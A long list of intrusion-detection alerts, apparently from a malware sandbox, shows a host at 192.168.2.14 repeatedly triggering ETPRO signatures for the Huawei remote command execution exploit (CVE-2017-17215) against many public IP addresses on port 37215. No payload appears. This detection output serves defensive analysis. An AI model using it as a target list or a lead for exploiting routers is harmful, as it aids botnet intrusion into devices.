                                                    07/10/24-08:26:41.325591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4282437215192.168.2.14197.193.185.168
                                                    07/10/24-08:26:45.583346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312837215192.168.2.14197.57.148.150
                                                    07/10/24-08:27:23.937320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760037215192.168.2.14197.25.112.1
                                                    07/10/24-08:27:33.753390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666437215192.168.2.14197.26.96.22
                                                    07/10/24-08:27:30.532639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547637215192.168.2.1440.153.124.34
                                                    07/10/24-08:26:41.462014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332637215192.168.2.141.77.198.180
                                                    07/10/24-08:26:17.949635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187037215192.168.2.1441.176.9.147
                                                    07/10/24-08:26:43.672613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000437215192.168.2.14197.176.122.201
                                                    07/10/24-08:26:29.887676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4454437215192.168.2.14157.39.61.3
                                                    07/10/24-08:26:41.535684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374637215192.168.2.14197.146.42.137
                                                    07/10/24-08:27:02.996765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693837215192.168.2.1441.91.18.215
                                                    07/10/24-08:27:08.380620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4377237215192.168.2.1441.208.177.115
                                                    07/10/24-08:27:13.979728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576837215192.168.2.1441.71.159.135
                                                    07/10/24-08:26:42.426125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569637215192.168.2.14197.189.248.154
                                                    07/10/24-08:27:02.836233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339637215192.168.2.14157.255.142.222
                                                    07/10/24-08:27:10.576440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411637215192.168.2.14197.34.155.238
                                                    07/10/24-08:27:05.113927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835037215192.168.2.1441.242.29.128
                                                    07/10/24-08:27:17.078951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574037215192.168.2.1441.87.11.195
                                                    07/10/24-08:27:24.995730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073037215192.168.2.1427.124.186.107
                                                    07/10/24-08:26:15.831289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936637215192.168.2.14222.194.67.105
                                                    07/10/24-08:27:24.980775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5451637215192.168.2.14197.11.144.149
                                                    07/10/24-08:26:13.748733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543237215192.168.2.14197.95.228.157
                                                    07/10/24-08:26:55.456990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156637215192.168.2.1441.159.155.178
                                                    07/10/24-08:27:19.278203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4366837215192.168.2.14157.82.225.223
                                                    07/10/24-08:26:14.799100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361637215192.168.2.14157.162.180.95
                                                    07/10/24-08:26:33.252129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649237215192.168.2.1441.75.199.249
                                                    07/10/24-08:26:57.565173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142437215192.168.2.1441.155.156.73
                                                    07/10/24-08:27:22.866153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777837215192.168.2.14165.84.48.189
                                                    07/10/24-08:26:33.251100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684637215192.168.2.1441.109.240.81
                                                    07/10/24-08:27:08.385644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.14157.68.26.35
                                                    07/10/24-08:27:22.551128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4564637215192.168.2.1441.51.71.233
                                                    07/10/24-08:27:27.126128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310237215192.168.2.14157.201.11.40
                                                    07/10/24-08:26:28.927122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257837215192.168.2.1441.17.31.72
                                                    07/10/24-08:27:33.934356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187437215192.168.2.1441.193.148.245
                                                    07/10/24-08:27:10.663912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080837215192.168.2.14197.38.248.15
                                                    07/10/24-08:26:26.591446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546437215192.168.2.14157.77.36.230
                                                    07/10/24-08:27:14.793732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5347237215192.168.2.14197.183.4.136
                                                    07/10/24-08:26:36.323441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015037215192.168.2.1441.245.163.103
                                                    07/10/24-08:27:10.668166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106237215192.168.2.14197.168.41.255
                                                    07/10/24-08:27:19.306994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091437215192.168.2.1441.202.32.127
                                                    07/10/24-08:26:49.819720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.14197.126.114.58
                                                    07/10/24-08:27:23.949605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5621637215192.168.2.14197.34.79.15
                                                    07/10/24-08:27:23.938620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.14157.95.83.13
                                                    07/10/24-08:26:13.766150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429237215192.168.2.14157.87.82.194
                                                    07/10/24-08:26:28.869440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746437215192.168.2.1488.190.175.33
                                                    07/10/24-08:27:14.827269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871237215192.168.2.14197.129.156.204
                                                    07/10/24-08:26:28.938884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414437215192.168.2.14197.227.62.199
                                                    07/10/24-08:26:28.795318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358637215192.168.2.14197.228.226.87
                                                    07/10/24-08:26:47.886738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4380237215192.168.2.14157.4.164.188
                                                    07/10/24-08:27:27.160309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920837215192.168.2.14142.99.232.164
                                                    07/10/24-08:27:17.068125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6035037215192.168.2.14197.185.246.195
                                                    07/10/24-08:26:38.565091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717837215192.168.2.14197.121.235.84
                                                    07/10/24-08:27:10.558738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.14197.97.131.170
                                                    07/10/24-08:27:34.119977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331037215192.168.2.14157.66.211.108
                                                    07/10/24-08:27:05.164451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4660837215192.168.2.14157.26.4.209
                                                    07/10/24-08:26:15.813781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5195837215192.168.2.14197.147.30.191
                                                    07/10/24-08:27:13.961699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186037215192.168.2.1441.130.225.33
                                                    07/10/24-08:27:14.847892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894837215192.168.2.14197.70.27.198
                                                    07/10/24-08:26:28.837178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042637215192.168.2.14197.224.236.31
                                                    07/10/24-08:26:59.577459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4740437215192.168.2.1441.199.160.133
                                                    07/10/24-08:26:18.029316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713037215192.168.2.1441.17.183.50
                                                    07/10/24-08:27:31.543266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556037215192.168.2.14157.199.20.102
                                                    07/10/24-08:26:43.902594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716437215192.168.2.14154.235.244.3
                                                    07/10/24-08:27:02.736564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909437215192.168.2.14197.43.100.174
                                                    07/10/24-08:27:33.948431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921037215192.168.2.14145.7.118.122
                                                    07/10/24-08:26:22.281648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089637215192.168.2.14157.97.48.238
                                                    07/10/24-08:27:02.683059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477837215192.168.2.14220.148.128.122
                                                    07/10/24-08:26:28.937799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742837215192.168.2.1441.245.166.64
                                                    07/10/24-08:26:52.043481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346437215192.168.2.1441.162.208.251
                                                    07/10/24-08:26:14.814573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556837215192.168.2.1441.159.148.223
                                                    07/10/24-08:27:31.439490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759837215192.168.2.14197.79.85.119
                                                    07/10/24-08:26:25.460773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222437215192.168.2.1441.30.71.211
                                                    07/10/24-08:26:48.002898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259837215192.168.2.14197.90.32.145
                                                    07/10/24-08:26:45.598670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690837215192.168.2.14157.220.186.159
                                                    07/10/24-08:27:23.930240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507437215192.168.2.14157.3.166.7
                                                    07/10/24-08:27:32.593829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596037215192.168.2.14157.102.168.120
                                                    07/10/24-08:27:33.886878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242037215192.168.2.1441.199.95.125
                                                    07/10/24-08:26:29.876812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605637215192.168.2.14197.4.223.188
                                                    07/10/24-08:26:51.988917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3476637215192.168.2.1441.162.174.37
                                                    07/10/24-08:27:00.565253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907237215192.168.2.1494.209.85.2
                                                    07/10/24-08:26:23.279248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696637215192.168.2.1441.54.105.48
                                                    07/10/24-08:27:17.030907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.14123.172.151.46
                                                    07/10/24-08:27:22.844415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245637215192.168.2.1441.23.102.84
                                                    07/10/24-08:27:02.830605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721037215192.168.2.1441.26.237.252
                                                    07/10/24-08:26:22.300901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018037215192.168.2.14129.217.157.124
                                                    07/10/24-08:27:08.385643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648037215192.168.2.14212.187.209.149
                                                    07/10/24-08:26:14.720259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549037215192.168.2.1466.140.103.139
                                                    07/10/24-08:27:23.914587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297637215192.168.2.14157.90.13.196
                                                    07/10/24-08:27:22.757983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166437215192.168.2.14157.100.112.65
                                                    07/10/24-08:26:55.418151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3524237215192.168.2.1441.241.164.30
                                                    07/10/24-08:26:34.239596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.14157.85.248.1
                                                    07/10/24-08:26:41.439991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106837215192.168.2.1473.152.137.136
                                                    07/10/24-08:27:19.279611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831037215192.168.2.14125.29.154.10
                                                    07/10/24-08:27:08.425989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496637215192.168.2.1441.245.97.184
                                                    07/10/24-08:26:38.576463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378837215192.168.2.14197.23.118.46
                                                    07/10/24-08:27:08.421673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.14157.198.13.146
                                                    07/10/24-08:26:28.909178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371237215192.168.2.14197.32.116.25
                                                    07/10/24-08:27:19.326133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271437215192.168.2.14197.235.205.42
                                                    07/10/24-08:26:51.979498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828037215192.168.2.14203.10.157.244
                                                    07/10/24-08:27:20.487738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403637215192.168.2.14157.236.230.213
                                                    07/10/24-08:26:43.657451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367437215192.168.2.1441.15.240.127
                                                    07/10/24-08:27:30.516492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747437215192.168.2.14157.135.117.148
                                                    07/10/24-08:26:17.967013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3736237215192.168.2.14197.10.161.2
                                                    07/10/24-08:26:28.639022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068637215192.168.2.14197.26.94.11
                                                    07/10/24-08:27:07.322486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071437215192.168.2.14157.157.140.175
                                                    07/10/24-08:26:26.585190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006837215192.168.2.1451.191.248.202
                                                    07/10/24-08:27:33.904086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592237215192.168.2.14157.31.9.15
                                                    07/10/24-08:26:57.587919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4502437215192.168.2.14157.209.93.114
                                                    07/10/24-08:27:28.049112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660237215192.168.2.1445.155.61.42
                                                    07/10/24-08:26:13.820956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097637215192.168.2.14203.8.230.173
                                                    07/10/24-08:26:33.237897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5755237215192.168.2.14157.206.190.175
                                                    07/10/24-08:26:15.854243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497037215192.168.2.14155.198.173.173
                                                    07/10/24-08:27:33.687075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520637215192.168.2.14153.66.101.74
                                                    07/10/24-08:27:27.151172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629037215192.168.2.1441.64.113.121
                                                    07/10/24-08:26:17.997634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5211037215192.168.2.14157.113.1.146
                                                    07/10/24-08:26:15.831923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035237215192.168.2.142.129.11.218
                                                    07/10/24-08:26:33.256885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311437215192.168.2.14157.14.90.25
                                                    07/10/24-08:27:17.084652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475837215192.168.2.14197.28.29.248
                                                    07/10/24-08:27:28.035789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.1441.195.76.221
                                                    07/10/24-08:27:33.977851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805437215192.168.2.1441.188.19.150
                                                    07/10/24-08:27:13.968872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018037215192.168.2.14197.50.201.74
                                                    07/10/24-08:27:33.768377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5670237215192.168.2.14197.219.111.94
                                                    07/10/24-08:26:38.529678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643037215192.168.2.14197.27.35.86
                                                    07/10/24-08:26:52.035645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438837215192.168.2.14197.54.124.34
                                                    07/10/24-08:26:17.961786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383637215192.168.2.14197.99.192.159
                                                    07/10/24-08:27:03.015604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560437215192.168.2.1441.247.113.169
                                                    07/10/24-08:27:10.554172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512237215192.168.2.1441.135.211.99
                                                    07/10/24-08:27:14.867172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.14157.208.242.225
                                                    07/10/24-08:26:41.585181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028637215192.168.2.14149.123.250.157
                                                    07/10/24-08:26:47.941527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964437215192.168.2.1441.144.218.69
                                                    07/10/24-08:26:51.951264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163037215192.168.2.14199.237.65.160
                                                    07/10/24-08:26:53.190112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4219037215192.168.2.14157.148.22.132
                                                    07/10/24-08:27:19.349992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928237215192.168.2.14157.208.193.66
                                                    07/10/24-08:27:19.322147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055037215192.168.2.1441.102.151.156
                                                    07/10/24-08:26:43.537786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863237215192.168.2.1441.109.210.60
                                                    07/10/24-08:27:03.014549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3813037215192.168.2.1441.195.13.5
                                                    07/10/24-08:26:47.888787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664037215192.168.2.14197.218.102.224
                                                    07/10/24-08:26:28.775037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698237215192.168.2.14207.34.5.230
                                                    07/10/24-08:27:28.035789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5556637215192.168.2.1472.184.130.164
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749837215192.168.2.14114.253.21.135
                                                    07/10/24-08:26:13.753086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080837215192.168.2.1476.178.176.183
                                                    07/10/24-08:27:13.905026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498637215192.168.2.14197.46.68.235
                                                    07/10/24-08:27:02.981155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583037215192.168.2.14157.21.214.122
                                                    07/10/24-08:27:05.167933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.14157.25.134.93
                                                    07/10/24-08:26:59.879798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603837215192.168.2.14223.213.23.42
                                                    07/10/24-08:26:28.853209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164837215192.168.2.14157.167.2.6
                                                    07/10/24-08:26:36.391790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.14183.126.26.209
                                                    07/10/24-08:27:07.369719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731237215192.168.2.1441.69.236.135
                                                    07/10/24-08:26:29.812412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329437215192.168.2.14164.251.164.81
                                                    07/10/24-08:26:43.651509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849637215192.168.2.1495.146.90.5
                                                    07/10/24-08:27:07.394204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068837215192.168.2.14157.225.33.138
                                                    07/10/24-08:27:11.528287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676037215192.168.2.14192.59.50.144
                                                    07/10/24-08:27:33.839511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581437215192.168.2.14133.230.126.182
                                                    07/10/24-08:26:43.814052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612237215192.168.2.1441.3.41.153
                                                    07/10/24-08:26:26.529010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033037215192.168.2.14157.202.40.202
                                                    07/10/24-08:27:20.450193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073037215192.168.2.14105.144.234.145
                                                    07/10/24-08:26:59.880494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748037215192.168.2.1441.186.69.107
                                                    07/10/24-08:26:57.662909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850237215192.168.2.1441.27.12.80
                                                    07/10/24-08:26:42.425783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3424637215192.168.2.1453.70.165.34
                                                    07/10/24-08:26:13.647852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613837215192.168.2.14197.13.120.109
                                                    07/10/24-08:27:22.938789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967237215192.168.2.14197.233.117.141
                                                    07/10/24-08:27:05.156857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635637215192.168.2.1484.203.147.63
                                                    07/10/24-08:26:23.328619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.1441.41.219.188
                                                    07/10/24-08:26:43.786770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174637215192.168.2.14124.57.107.148
                                                    07/10/24-08:26:17.997634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681237215192.168.2.14157.29.238.144
                                                    07/10/24-08:26:55.421781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4490037215192.168.2.1441.180.96.107
                                                    07/10/24-08:27:14.898333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377837215192.168.2.1441.128.62.230
                                                    07/10/24-08:27:05.210866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864037215192.168.2.1441.62.117.246
                                                    07/10/24-08:27:08.429606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473837215192.168.2.1441.56.226.233
                                                    07/10/24-08:26:59.721155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518037215192.168.2.14157.144.146.253
                                                    07/10/24-08:27:05.153820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3810037215192.168.2.14197.199.46.74
                                                    07/10/24-08:26:31.054322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635437215192.168.2.14177.124.208.119
                                                    07/10/24-08:27:32.614916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700237215192.168.2.1443.73.72.116
                                                    07/10/24-08:26:14.824393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941237215192.168.2.14197.112.60.5
                                                    07/10/24-08:26:57.657742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900837215192.168.2.14157.177.165.56
                                                    07/10/24-08:27:10.595631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704237215192.168.2.1441.39.164.84
                                                    07/10/24-08:26:57.627051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253037215192.168.2.14157.96.217.199
                                                    07/10/24-08:26:23.309785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5292437215192.168.2.1441.212.101.17
                                                    07/10/24-08:26:18.016670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734637215192.168.2.1441.91.123.19
                                                    07/10/24-08:27:03.007894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373637215192.168.2.14197.196.117.123
                                                    07/10/24-08:26:25.443294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4662837215192.168.2.1424.151.159.246
                                                    07/10/24-08:27:34.134892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332037215192.168.2.14153.30.80.26
                                                    07/10/24-08:26:48.009015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628437215192.168.2.14157.251.13.42
                                                    07/10/24-08:26:43.813541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269237215192.168.2.1423.74.120.223
                                                    07/10/24-08:27:28.045782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365037215192.168.2.14197.84.57.7
